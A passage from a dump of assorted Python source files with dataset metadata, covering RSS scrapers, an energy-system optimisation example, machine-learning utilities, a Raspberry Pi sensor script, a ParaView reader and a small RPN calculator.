self.epoch = epoch\n\n def making_soup (self ,string ) :\n return BeautifulSoup (string )\n\n def returning_image ( self, string ) :\n return self.making_soup(string).img.get('src')\n\n def returning_text (self , string ) :\n soup =BeautifulSoup (string)\n textList = [ ]\n if soup.findAll('p') != [] :\n for e in soup.findAll ('p') :\n textList.append(e.text.encode('ascii','xmlcharrefreplace') +'\\n' )\n return \"\".join(textList)\n else :\n return None\n\n def rss (self ) :\n for child in self.tree.getroot() : # channel tag\n for f in child.findall('item'):\n instance = rssInitialisation ( f , 'tvline.com' )\n if ( instance.epoch_pubdate > self.epoch ):\n list = []\n list.append( instance.epoch_pubdate)\n list.append ( instance.source)\n list.append( instance.title)\n list.append( instance.link)\n list.append(instance.isodate)\n string = f.find('.//{http://purl.org/rss/1.0/modules/content/}encoded').text\n list.append(self.returning_text(string))\n if ('.//{http://search.yahoo.com/mrss/}thumbnail') is not None :\n list.append(f.find('.//{http://search.yahoo.com/mrss/}thumbnail').get('url'))\n else :\n list.append (None)\n self.list.append(list)\n return self.list\n\n\n\nclass indieWireTvRss ( initialisation) :\n def __init__ (self ,url ,epoch=None) :\n initialisation.__init__ ( self, url )\n self.epoch = epoch\n\n def rss (self ) :\n for child in self.tree.getroot() : # channel tag\n for f in child.findall('item'):\n instance = rssInitialisation ( f , 'indiewiretelevision.com' )\n if ( instance.epoch_pubdate > self.epoch ):\n list = []\n list.append( instance.epoch_pubdate)\n list.append ( instance.source)\n list.append( instance.title)\n list.append( instance.link)\n list.append(instance.isodate)\n string = instance.description\n list.append(nltk.clean_html (string))\n list.append (f.find('enclosure').get('url'))\n self.list.append(list)\n return self.list\n\n\n\nclass rss_list :\n def __init__ ( self , string , collection ) :\n self.string = string \n self.collection = collection \n self.epochstring = self.string+'epoch' \n\n def deciding_web (self ) :\n if self.string == 'indieWireTv' :\n I = epochTime( self.collection , self.epochstring )\n instance = indieWireTvRss( 'http://feeds.feedburner.com/IndiewireTelevision' ,epoch=I.last_epoch())\n return instance.rss()\n\n if self.string == 'tvLine' :\n I = epochTime( self.collection , self.epochstring )\n instance = tvLineRss( 'http://tvline.com/feed/' ,epoch=I.last_epoch())\n return instance.rss()\n\n if self.string == 'tvGuide' :\n I = epochTime( self.collection , self.epochstring )\n instance = tvGuideRss( 'http://rss.tvguide.com/breakingnews' ,epoch=I.last_epoch())\n return instance.rss()\n\n","sub_path":"televisionrss.py","file_name":"televisionrss.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"361166584","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nExample to show the functionality of the solar thermal collector\nwith a fixed collector size (aperture area).\n\nauthors: Franziska Pleissner, Caroline Möller\n\nSPDX-License-Identifier: GPL-3.0-or-later\n\"\"\"\nimport os\n\nimport pandas as pd\n\nfrom oemof import solph\nfrom oemof.tools import economics\nfrom oemof.thermal.solar_thermal_collector import flat_plate_precalc\n\nfrom ._plots import plot_collector_heat\n\ndef flat_plate_collector_example():\n # Set paths\n base_path = os.path.dirname(os.path.abspath(os.path.join(__file__)))\n data_path = os.path.join(base_path, 'data')\n results_path = os.path.join(base_path, 'results')\n if not os.path.exists(results_path):\n os.mkdir(results_path)\n\n # Parameters for the precalculation\n periods = 48\n latitude = 52.2443\n longitude = 10.5594\n collector_tilt = 10\n collector_azimuth = 20\n a_1 = 1.7\n a_2 = 0.016\n eta_0 = 0.73\n temp_collector_inlet = 20\n delta_temp_n = 10\n\n # Read input data\n input_data = pd.read_csv(os.path.join(data_path, 'data_flat_collector.csv')).head(periods)\n input_data['Datum'] = pd.to_datetime(input_data['Datum'])\n input_data.set_index('Datum', inplace=True)\n input_data.index = input_data.index.tz_localize(tz='Europe/Berlin')\n input_data = input_data.asfreq('H')\n\n demand_df = pd.read_csv(\n os.path.join(base_path, 'data', 'heat_demand.csv'),\n sep=','\n )\n demand = list(demand_df['heat_demand'].iloc[:periods])\n\n # Precalculation\n # - calculate global irradiance on the collector area\n # and collector efficiency depending on the\n # temperature difference -\n precalc_data = flat_plate_precalc(\n latitude,\n longitude,\n collector_tilt,\n collector_azimuth,\n eta_0,\n a_1,\n a_2,\n temp_collector_inlet,\n delta_temp_n,\n irradiance_global=input_data['global_horizontal_W_m2'],\n irradiance_diffuse=input_data['diffuse_horizontal_W_m2'],\n temp_amb=input_data['temp_amb'],\n )\n\n precalc_data.to_csv(\n os.path.join(results_path, 'flat_plate_precalcs.csv'),\n sep=';'\n )\n\n\n # regular oemof system #\n\n # Parameters for the energy system\n peripheral_losses = 0.05\n elec_consumption = 0.02\n backup_costs = 40\n costs_storage = economics.annuity(20, 20, 0.06)\n costs_electricity = 1000\n storage_loss_rate = 0.001\n conversion_storage = 0.98\n size_collector = 10 # m2\n\n # busses\n bth = solph.Bus(label='thermal')\n bel = solph.Bus(label='electricity')\n bcol = solph.Bus(label='solar')\n\n # source for collector heat.\n # - actual_value is the precalculated collector heat -\n collector_heat = solph.components.Source(\n label='collector_heat',\n outputs={\n bcol: solph.Flow(\n fix=precalc_data['collectors_heat'],\n nominal_value=size_collector,\n )\n },\n )\n\n # sources and sinks\n el_grid = solph.components.Source(\n label='grid', outputs={bel: solph.Flow(variable_costs=costs_electricity)}\n )\n\n backup = solph.components.Source(\n label='backup', outputs={bth: solph.Flow(variable_costs=backup_costs)}\n )\n\n consumer = solph.components.Sink(\n label='demand',\n inputs={bth: solph.Flow(fix=demand, nominal_value=1)},\n )\n\n collector_excess_heat = solph.components.Sink(\n label='collector_excess_heat', inputs={bcol: solph.Flow()}\n )\n\n # transformer and storage\n collector = solph.components.Transformer(\n label='collector',\n inputs={bcol: solph.Flow(), bel: solph.Flow()},\n outputs={bth: solph.Flow()},\n conversion_factors={\n bcol: 1,\n bel: elec_consumption * (1 - peripheral_losses),\n bth: 1 - peripheral_losses\n },\n )\n\n storage = solph.components.GenericStorage(\n label='storage',\n inputs={bth: solph.Flow()},\n outputs={bth: solph.Flow()},\n loss_rate=storage_loss_rate,\n inflow_conversion_factor=conversion_storage,\n outflow_conversion_factor=conversion_storage,\n investment=solph.Investment(ep_costs=costs_storage),\n )\n\n # Build the system and solve the problem\n date_time_index = input_data.index\n energysystem = solph.EnergySystem(timeindex=date_time_index)\n\n energysystem.add(\n bth,\n bcol,\n bel,\n collector_heat,\n el_grid,\n backup,\n consumer,\n collector_excess_heat,\n storage,\n collector,\n )\n\n # Create and solve the optimization model\n model = solph.Model(energysystem)\n model.solve(solver='cbc', solve_kwargs={'tee': True})\n\n # Get results\n results = solph.processing.results(model)\n\n electricity_bus = solph.views.node(results, 'electricity')['sequences']\n thermal_bus = solph.views.node(results, 'thermal')['sequences']\n solar_bus = solph.views.node(results, 'solar')['sequences']\n df = pd.merge(\n pd.merge(electricity_bus, thermal_bus, left_index=True, right_index=True),\n solar_bus, left_index=True, right_index=True)\n df.to_csv(os.path.join(results_path, 'flat_plate_results.csv'))\n\n # Example plot\n plot_collector_heat(precalc_data, periods, eta_0)\n\n\nif __name__ == \"__main__\":\n flat_plate_collector_example()\n","sub_path":"examples/solar_thermal_collector/flat_plate_collector.py","file_name":"flat_plate_collector.py","file_ext":"py","file_size_in_byte":5359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"550932838","text":"import cPickle as pickle\nfrom nolearn.lasagne import NeuralNet\nimport numpy as np\nimport matplotlib.pyplot as pyplot\n\ndef load_net(fname):\n\treturn pickle.load(open(fname, 'rb'))\n\nnet = load_net('net.pickle')\n\ntrain_loss = np.array([i[\"train_loss\"] for i in net.train_history_])\nvalid_loss = np.array([i[\"valid_loss\"] for i in net.train_history_])\npyplot.plot(train_loss[1:], linewidth=3, label=\"train\")\npyplot.plot(valid_loss[1:], linewidth=3, label=\"valid\")\npyplot.grid()\npyplot.legend()\npyplot.xlabel(\"epoch\")\npyplot.ylabel(\"loss\")\n# pyplot.ylim(1e-3, 1e-2)\npyplot.yscale(\"log\")\npyplot.show()\n","sub_path":"bogo/info_from_net.py","file_name":"info_from_net.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"362276896","text":"\n\nfrom xai.brain.wordbase.nouns._lad import _LAD\n\n#calss header\nclass _LADS(_LAD, ):\n\tdef __init__(self,): \n\t\t_LAD.__init__(self)\n\t\tself.name = \"LADS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"lad\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_lads.py","file_name":"_lads.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"90521468","text":"file=open(\"B-large.in\")\r\nk=file.readline()\r\na=int(k[:-1])\r\nw=open(\"output.txt\",\"w\")\r\nfor num in range(a):\r\n k=int(file.readline()[:-1])\r\n dic={}\r\n for i in range((2*k-1)):\r\n line=file.readline()\r\n while True:\r\n n=line.find(\" \")\r\n if n==-1:\r\n pp=int(line[:])\r\n if pp in dic:\r\n dic[pp]+=1\r\n else:\r\n dic[pp]=1\r\n break\r\n else:\r\n a+=1\r\n pp=int(line[0:n])\r\n if pp in dic:\r\n dic[pp]+=1\r\n else:\r\n dic[pp]=1\r\n line=line[n+1:]\r\n lst=[]\r\n for i in dic:\r\n if dic[i]%2==1:\r\n lst.append(i)\r\n lst.sort()\r\n ans=\"\"\r\n for i in lst:\r\n ans+=\" \"+str(i)\r\n s=\"case #\"+str(num+1)+\":\"+ans+\"\\n\"\r\n w.write(s)\r\nw.close()\r\n \r\n","sub_path":"codes/CodeJamCrawler/16_1_2/yumou/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"410196414","text":"a = input(\"甲方的數字:\").split()\nb = input(\"乙方的數字:\").split()\ntmp = 0\nresult = [\"和\",\"贏\",\"輸\"]\nlist1 = []\nfor i in range(len(a)):\n if a[i]>b[i]:\n tmp += 1\n list1.append(tmp)\n elif a[i] 2:\n\tmd.miscellaneous.name = os.path.basename(inspect.stack()[2][1]).split('.')[0]\n","sub_path":"trunk/test/Par/Pig.py","file_name":"Pig.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"422824430","text":"# -*- coding:utf-8 -*-\n# @Author:pgzhang\n\nfrom keras.utils import to_categorical\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras import backend as K\nfrom keras.preprocessing.text import Tokenizer\nfrom numpy import array\nimport numpy as np\nimport os\nfrom PIL import Image\nimport utils\nfrom parameters import *\n\ndef img_preprocess(img_path:str, img_size:tuple=INPUT_IMG_SIZE) ->np.array:\n img = Image.open(img_path)\n if img.mode != 'RGB':\n img = img.convert('RGB')\n w_h_tuple = (img_size[1], img_size[0])\n\n if img.size != w_h_tuple:\n img = img.resize(w_h_tuple,Image.NEAREST)\n\n img = np.asarray(img, dtype=K.floatx())\n #img = img.reshape((1,img.shape[0], img.shape[1], img.shape[2]))\n\n img = img[...,::-1]\n mean = [103.939, 116.779, 123.68]\n img[...,0] -= mean[0]\n img[...,1] -= mean[1]\n img[...,2] -= mean[2]\n\n return img\n\ndef create_tokenizer(imgFile:str,captFile:str) -> Tokenizer:\n img_id = utils.load_dataset(imgFile)\n caption_dict = utils.load_captions(captFile,img_id)\n texts_list = utils.dict_to_list(caption_dict)\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts(texts_list)\n return tokenizer\n\ndef create_input_one_img(tokenizer:Tokenizer, img:np.array,max_len:int,\n capt_list:list, vocab_size:int) -> tuple:\n img_input, seq_input, output = list(), list(), list()\n for capt in capt_list:\n seq = tokenizer.texts_to_sequences([capt])[0]\n for i in range(len(seq)):\n in_seq, out_seq = seq[:i], seq[i]\n in_seq = pad_sequences([in_seq],maxlen=max_len)[0]\n out_seq = to_categorical([out_seq],num_classes=vocab_size)[0]\n img_input.append(img)\n seq_input.append(in_seq)\n output.append(out_seq)\n\n return array(img_input),array(seq_input), array(output)\n\ndef data_generator(tokenizer:Tokenizer, max_len:int,\n captions:dict, vocab_size:int) -> list:\n #while 1:\n for img_id, capt_list in captions.items():\n img_path = os.path.join(DATA_DIR, IMG_DIR, img_id+'.jpg')\n img = img_preprocess(img_path)\n img_input, seq_input, output = create_input_one_img(\n tokenizer, img, max_len,capt_list, vocab_size)\n\n yield [[img_input,seq_input],output]\n\n\n\n\n\n\n","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"512242232","text":"import spidev, time\nimport RPi.GPIO as GPIO\n\nled = 18\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(led,GPIO.OUT)\nspi = spidev.SpiDev()\nspi.open(0,0)\nspi.max_speed_hz=1350000\n\ndef analog_read(channel):\n r = spi.xfer2([1, (8+channel) << 4,0])\n adc_out = ((r[1]&3)<<8)+r[2]\n return adc_out\n\nwhile True:\n reading = analog_read(1)\n voltage = reading * 5.0/1024\n print(\"Reading=%d\\tVoltage=%f\"%(reading, voltage))\n time.sleep(1)\n if reading > 5 :\n GPIO.output(led, GPIO.HIGH)\n print(\"LED ON\")\n else :\n GPIO.output(led, GPIO.LOW)\n print(\"LED OFF\")\n\n","sub_path":"raspberry/SensorControl/LightSensorRead_LED_ON.py","file_name":"LightSensorRead_LED_ON.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"127464189","text":"\n\n\n\n# coding: utf-8\n\n'''\n\tCodded By : \n\n █ █░ ██▓ ██▓ ▓█████▄ ▒█████ ███▄ █ ██▓ ▒█████ ███▄ █ \n▓█░ █ ░█░▓██▒▓██▒ ▒██▀ ██▌▒██▒ ██▒ ██ ▀█ █ ▓██▒▒██▒ ██▒ ██ ▀█ █ \n▒█░ █ ░█ ▒██▒▒██░ ░██ █▌▒██░ ██▒▓██ ▀█ ██▒▒██▒▒██░ ██▒▓██ ▀█ ██▒\n░█░ █ ░█ ░██░▒██░ ░▓█▄ ▌▒██ ██░▓██▒ ▐▌██▒░██░▒██ ██░▓██▒ ▐▌██▒\n░░██▒██▓ ░██░░██████▒░▒████▓ ░ ████▓▒░▒██░ ▓██░░██░░ ████▓▒░▒██░ ▓██\n\n\n\n --------------------------------------------\n| Position Classifier\n| -------------------------------------------\n| predict and save positions using\n| a pre-trained model.\n|\n|\n|\n| self.model : classifier pre-trained model\n| self.__save : save prediction on input data into a csv file\n| self.__load : load pre-trained classifier model\n| self.predict : predict output on input data\n| self.__call__ \t\t\t : make a prediction on a input data\n|\n|\n|\n\n\n'''\n\n\nfrom sklearn import preprocessing\nfrom ._nn import Position \nimport matplotlib.pyplot as plt\nimport sys\nimport os\nimport pickle\nimport pathlib\nimport pandas as pd\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\n\n\nclass predictor:\n\tdef __init__(self, **model_conf):\n\t\tself.__model_path = model_conf[\"path\"]\n\t\tself.__positions = model_conf[\"positions\"]\n\t\tself.__data_type = model_conf[\"data_type\"]\n\t\tself.__input_features = model_conf[\"features\"][\"in\"]\n\t\tself.__output_features = model_conf[\"features\"][\"out\"]\n\t\tself.__input_data = None\n\t\tself.model = None\n\n\t\tcuda = torch.cuda.is_available() if model_conf[\"device\"] is 'cuda' else None\n\t\tself.__device = torch.device(\"cuda\" if cuda else \"cpu\")\n\t\ttorch.backends.cudnn.benchmark = True\n\n\n\t\tif os.path.exists(self.__model_path):\n\t\t\tprint(f\"\\n________found existing pre-trained classifier model trained on {self.__data_type} data for prediction________\\n\")\n\t\t\tself.__load()\n\t\telse:\n\t\t\tprint(f\"\\t➢ something went wrong with loading pre-trained classifier model, please make sure there is one at {self.__model_path}\")\n\t\t\tsys.exit(1)\n\n\n\tdef __load(self):\n\t\ttry:\n\t\t\tcheckpoint = torch.load(self.__model_path)\n\t\t\tprint(f\"\\t➢ loaded pre-trained model from {self.__model_path}\\n\")\n\t\texcept IOError:\n\t\t\tprint(f\"\\t➢ can't load pre-trained model from : {self.__model_path}\\n\")\n\n\n\t\tself.model = Position(input_neurons=self.__input_features, output_neurons=self.__output_features).to(self.__device)\n\t\tself.model.load_state_dict(checkpoint['model_state_dict'])\n\t\tself.optimizer = torch.optim.SGD(self.model.parameters(), lr=1e-3, momentum=0.9)\n\t\tself.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n\t\tself.epoch = checkpoint['epoch']\n\t\tself.training_loss = checkpoint['training_loss']\n\t\tself.training_best_accuracy = checkpoint['training_best_accuracy']\n\t\tself.loss_tracker = checkpoint['loss_tracker']\n\t\tself.model.eval()\n\n\n\tdef __save(self, predictions):\n\t\tclassifier_obj_path = os.path.dirname(os.path.abspath(__file__))+f'/utils/classifier.obj'\n\t\tcurr_dir = os.path.dirname(os.path.abspath(__file__))\n\t\tinput_data = os.path.abspath(curr_dir + f\"/../../server/dataset/input_data.csv\")\n\t\tinput_data_classified = os.path.abspath(curr_dir + f\"/../../server/dataset/input_data_classified_positions_using-pre-trained_model_on-{self.__data_type}.csv\")\n\t\tnumpy_predictions = predictions.detach().numpy()\n\t\tDf = pd.read_csv(input_data)\n\t\tDf['position'] = np.array(list(self.__positions[pred] for pred in numpy_predictions))\n\t\tDf.to_csv(input_data_classified, index=False)\n\t\tprint(f\"\\t➢ new dataset saved in {input_data_classified}\\n\")\n\t\twith open(classifier_obj_path, \"wb\") as classifier_file:\n\t\t\tpickle.dump(self, classifier_file)\n\t\tprint(f\"\\t➢ classifier object saved in {classifier_obj_path}\\n\")\n\n\n\tdef __predict(self):\n\t\tif self.__input_data is not None:\n\t\t\tprint(f\"\\n________predicting on input data using pre-trained classifier on {self.__device}________\\n\")\n\t\t\t_input = Variable(torch.from_numpy(self.__input_data), requires_grad=False)\n\t\t\t_input = _input.to(self.__device)\n\t\t\toutputs = self.model(_input.float())\n\t\t\tpredictions = outputs.argmax(dim=1)\n\t\t\tif len(predictions) == 1: # we just classified only one user which is done through /user/classify/position route and we are returning the result back to the route\n\t\t\t\tposition = np.array(list(self.__positions[pred] for pred in predictions.detach().numpy()))\n\t\t\t\treturn position, self.__data_type # we need data type for saving predicted position into its related column\n\t\t\telse: # we just classified a bunch of input data using a csv file and we just saved the results into a csv file to insert them in db using /users/add/positions\n\t\t\t\tself.__save(predictions)\n\t\telse:\n\t\t\tprint(f\"[?] can't predict on a None data object.\")\n\t\t\tsys.exit(1)\n\n\n\tdef __call__(self, *args):\n\t\tfor arg in args:\n\t\t\tif type(arg) is pathlib.PosixPath:\n\t\t\t\tif os.path.dirname(arg):\n\t\t\t\t\tdf = pd.read_csv(arg)\n\t\t\t\t\tdf.drop('user_id', axis=1, inplace=True)\n\t\t\t\t\tinput_data = df.to_numpy()\n\t\t\t\t\tself.__input_data = preprocessing.StandardScaler().fit_transform(input_data)\n\t\t\t\t\tself.__predict()\n\t\t\t\telse:\n\t\t\t\t\tprint(f\"[?] make sure there is csv file at {arg}.\")\n\t\t\t\t\tsys.exit(1)\t\n\t\t\telif arg is None:\n\t\t\t\tprint(f\"[?] data object can't be None.\")\n\t\t\t\tsys.exit(1)\n\t\t\telif type(arg) is np.ndarray:\n\t\t\t\tself.__input_data = preprocessing.StandardScaler().fit_transform(arg)\n\t\t\t\treturn self.__predict()\n\t\t\telse:\n\t\t\t\tprint(f\"[?] please specify a numpyndarray data object or a csv path of data for prediction.\")\n\t\t\t\tsys.exit(1)\n\t\t\n","sub_path":"infra/position_classification/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":5988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"132461757","text":"from django.shortcuts import render\nfrom .models import Book\nimport datetime\nfrom django.core.paginator import Paginator\n\ndef books_view(request):\n template = 'books/books_list.html'\n books = Book.objects.order_by('pub_date')\n context = {\n 'books': books\n }\n return render(request, template, context)\n\n\ndef date_books(request, pub_date):\n template = 'books/book.html'\n book = Book.objects.order_by('pub_date')\n books = book.get(pub_date=pub_date)\n date = Book.objects.order_by('pub_date')\n date_next = date.filter(pub_date__gt=pub_date).first()\n if date_next == None:\n date_next = date.filter(pub_date__lt=pub_date).first()\n date_prev = date.filter(pub_date__lt=pub_date).last()\n if date_prev == None:\n date_prev = date.filter(pub_date__gt=pub_date).last()\n return render(request, template, context = {\n 'book': books,\n 'prev': date_prev.pub_date,\n 'next': date_next.pub_date\n })\n\n\n\n","sub_path":"databases/models_list_displaying/books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"418932882","text":"Name = 'ReadSGeMSFileToUniformGrid'\nLabel = 'Read SGeMS File To Uniform Grid'\nFilterCategory = 'PVGP Readers'\nHelp = 'NOTE: if reading a time series, they must all have the same extent!'\n\nNumberOfInputs = 0\nOutputDataType = 'vtkImageData'\nExtensions = 'sgems SGEMS SGeMS dat txt'\nReaderDescription = 'PVGP: SGeMS Grid File Format'\n\n\nProperties = dict(\n Delimiter_Field=' ',\n Use_tab_delimiter=False,\n Time_Step=1.0\n)\n\nPropertiesHelp = dict(\n Use_Tab_Delimiter='A boolean to override the Delimiter_Field and use Tab delimiter.',\n Time_Step='An advanced property for the time step in seconds.'\n)\n\n\ndef RequestData():\n from PVGPpy.read import sgemsGrid, getTimeStepFileIndex\n from paraview import util\n\n # This finds the index for the FileNames for the requested timestep\n i = getTimeStepFileIndex(self, FileNames, dt=Time_Step)\n\n # Generate Output\n pdo = self.GetOutput() # vtkTable\n sgemsGrid(FileNames[i], deli=Delimiter_Field, useTab=Use_tab_delimiter, pdo=pdo)\n\n\ndef RequestInformation():\n from paraview import util\n from PVGPpy.read import sgemsExtent, setOutputTimesteps, getTimeStepFileIndex\n # This is necessary to set time steps\n setOutputTimesteps(self, FileNames, dt=Time_Step)\n # Only grab extent for first file... requires all to have same extent\n ext = sgemsExtent(FileNames[0], deli=Delimiter_Field, useTab=Use_tab_delimiter)\n util.SetOutputWholeExtent(self, ext)\n","sub_path":"src/readers/read_sgems_to_uniform_grid.py","file_name":"read_sgems_to_uniform_grid.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"194333677","text":"#!/usr/bin/env python\n# coding=utf-8\n\nfrom fractions import Fraction\nfrom decimal import Decimal\n\n# meh, just don't mutate it\nclass idict(dict):\n\tdef __hash__(self):\n\t\treturn hash(tuple(sorted(self.items())))\n\nclass Value:\n\t# data :: (String → Value) → Fraction\n\t# sum [ val * product [ a^b | a→b <- set ] | set→val <- data ]\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\n\tdef __eq__(self, other):\n\t\treturn other and self.data == other.data\n\t\n\tdef __ne__(self, other):\n\t\treturn not other or self.data != other.data\n\t\n\tdef __hash__(self):\n\t\treturn hash(self.data)\n\t\n\tdef __add__(a, b):\n\t\tout = dict(a.data)\n\t\tfor bpart, bmult in b.data.items():\n\t\t\tif bpart in out:\n\t\t\t\tout[bpart] += bmult\n\t\t\t\tif out[bpart] == 0:\n\t\t\t\t\tdel out[bpart]\n\t\t\telse:\n\t\t\t\tout[bpart] = bmult\n\t\treturn Value(idict(out))\n\t\n\tdef __mul__(a, b):\n\t\tout = zero\n\t\tfor apart, amult in a.data.items():\n\t\t\tfor bpart, bmult in b.data.items():\n\t\t\t\tnewpart = dict(apart)\n\t\t\t\tfor bpartpart, bpartexp in bpart.items():\n\t\t\t\t\tif bpartpart in newpart:\n\t\t\t\t\t\tnewpart[bpartpart] += bpartexp\n\t\t\t\t\t\tif newpart[bpartpart] == zero:\n\t\t\t\t\t\t\tdel newpart[bpartpart]\n\t\t\t\t\telse:\n\t\t\t\t\t\tnewpart[bpartpart] = bpartexp\n\t\t\t\tout += Value({ idict(newpart): amult*bmult })\n\t\treturn out\n\t\n\tdef __sub__(a, b):\n\t\treturn b.__add__(a.negate())\n\t\n\tdef __truediv__(a, b):\n\t\treturn b.__mul__(a.invert())\n\t\n\tdef negate(a):\n\t\tout = dict(a.data)\n\t\tfor k in out.keys():\n\t\t\tout[k] *= -1\n\t\treturn Value(idict(out))\n\t\n\tdef invert(a):\n\t\tout = {}\n\t\tfor part, mult in a.data.items():\n\t\t\tparts = {}\n\t\t\tfor partpart, exp in part.items():\n\t\t\t\tparts[partpart] = exp.negate()\n\t\t\tout[idict(parts)] = 1/mult\n\t\treturn Value(idict(out))\n\t\n\tdef tree(self):\n\t\tout = None\n\t\tfor part, mult in self.data.items():\n\t\t\toutpart = mult\n\t\t\tfor partpart, exp in part.items():\n\t\t\t\toutpartpart = partpart\n\t\t\t\tif exp != one:\n\t\t\t\t\toutpartpart = (\"^\", [outpartpart, exp.tree()])\n\t\t\t\toutpart = (\"*\", [outpart, outpartpart])\n\t\t\tif out == None:\n\t\t\t\tout = outpart\n\t\t\telse:\n\t\t\t\tout = (\"+\", [out, outpart])\n\t\tif out == None:\n\t\t\tout = Fraction(0)\n\t\treturn out\n\n\tdef __repr__(self):\n\t\treturn \"Value(\" + str(self.data) + \")\"\n\t\n\tdef __str__(self):\n\t\treturn self.__repr__()\n\ndef makeValue(v):\n\tif isinstance(v, int):\n\t\treturn zero if v == 0 else Value(idict({ idict({}): Fraction(v) }))\n\tif all(map(str.isdigit, v)):\n\t\treturn makeValue(int(v))\n\treturn Value(idict({ idict({ str(v): one }): Fraction(1) }))\n\n# defined simply for convenience; other such objects might exist—they'll be equal to these ones .. hopefully\nzero = Value(idict({}))\none = makeValue(1)\n\ndef binop(fn):\n\treturn lambda s: s.append(fn(s.pop(), s.pop()))\n\ndef val(v):\n\treturn lambda s: s.append(v)\n\ndef parsetok(s):\n\tif s == \"*\": return binop(Value.__mul__)\n\tif s == \"/\": return binop(Value.__truediv__)\n\tif s == \"+\": return binop(Value.__add__)\n\tif s == \"-\": return binop(Value.__sub__)\n\treturn val(makeValue(s))\n\ndef evalrpn(s):\n\tif isinstance(s, str):\n\t\ts = filter(None, s.split(\" \"))\n\tstack = []\n\tfor i in map(parsetok, s):\n\t\ti(stack)\n\treturn stack\n\ndef treetorpn(t):\n\tif isinstance(t, Fraction):\n\t\tif t.denominator == 1:\n\t\t\treturn [str(t.numerator)]\n\t\t# TODO: fraction\n\t\treturn [str(t.numerator), str(t.denominator), \"/\"]\n\tif isinstance(t, str):\n\t\treturn [t]\n\top, operands = t\n\treturn sum(map(treetorpn, operands), []) + [op]\n\ndef compose(fns):\n\tout = lambda x: x\n\tfor fn in reversed(fns):\n\t\tout = compose2(fn, out)\n\treturn out\n\ndef compose2(a, b):\n\treturn lambda c: a(b(c))\n\ndef runrpn(input):\n\treturn \"; \".join(map(compose([\" \".join, treetorpn, Value.tree]), evalrpn(input)))\n\ndef rc(phenny, input):\n\tphenny.say(\"rc: \" + runrpn(input.group(2).encode(\"utf-8\")))\nrc.commands = ['rc']\nrc.example = '.rc 5 3 +'\n","sub_path":"modules/rc.py","file_name":"rc.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"262268533","text":"# -*- coding: utf-8 -*-\n\n# -*- coding: utf-8 -*-\nimport pandas as pd\n\nstrPath = '/Users/lishaojun/dev/liuyue/'\n\n\nfileA = 'taz_7_结果.xlsx'\nfileB = 'taz_10_big_2.csv'\n\n\ndf = pd.read_excel(strPath+fileA)\n\n\ndf= df.set_index('TAZ_ID')\ndf = df.sort_index()\n\ncols = df.columns[3:]\n\nres = []\nj = 0\nfor index, row in df.iterrows():\n for col in cols:\n for i in range(0,int(row[col])):\n res.append([j,index, int(row['STID']),col])\n j+=1\n \nfo = open(strPath+fileB,'w')\nfo.write('ID, TAZ_ID, STID, Field\\n')\nfor r in res:\n fo.write('%d, %d, %d, %s\\n'%(r[0]+1,r[1],r[2],r[3][1:]))\nfo.close()","sub_path":"liuyue/Script/tazarea10.py","file_name":"tazarea10.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"292269018","text":"import subprocess\n\n# per ogni ricostruzione, pernde tutti i files recon a tutte le enernge e lancia plotAll_PHA che divide in bin di L/W\n\n\n\n\n\n# scanRmin-Ws\nbase_dir='/data1/maldera/IXPE_work/rec_optimization/scanRmin-Ws/'\nmax_iter= 132+1\n\n\n\n\n\n#dirs=['001333','001361', '001388', '001416', '001436', '001461', '001471']\n#dirs=['001471']\n\n\n\n\n\n\n\nstringa1='#!/bin/bash \\n \\nFILE=\"/var/log/All_done.txt\"\\nwhile true \\ndo \\n if [ -f $FILE ]; then \\n echo \"File $FILE exists... let\\'s go!\" \\n'\nstringa2='\\n break \\n \\n else \\n echo \"File $FILE does not exist... waiting 30 secs\" \\n sleep 30\\n fi \\ndone \\n' \n\n\n\n\ndef run_command(cmd):\n \n print('going to run: ',cmd)\n subprocess.call(cmd,shell=True)\n\n\n\ndef crea_jobScript(command_string,work_dir):\n\n \n #command_string=command_string+' \\n'\n nomeFile=work_dir+'/job_script_analisi.sh'\n miofile = open(nomeFile,'w') # apre il file in scrittura\n miofile.write(stringa1)\n miofile.write(command_string) # !!!!!!!!!!!!!!!!!!!!!1 actual command!!!!!! \n miofile.write(stringa2)\n miofile.close() \n run_command('chmod a+x '+ nomeFile)\n\n\ndef 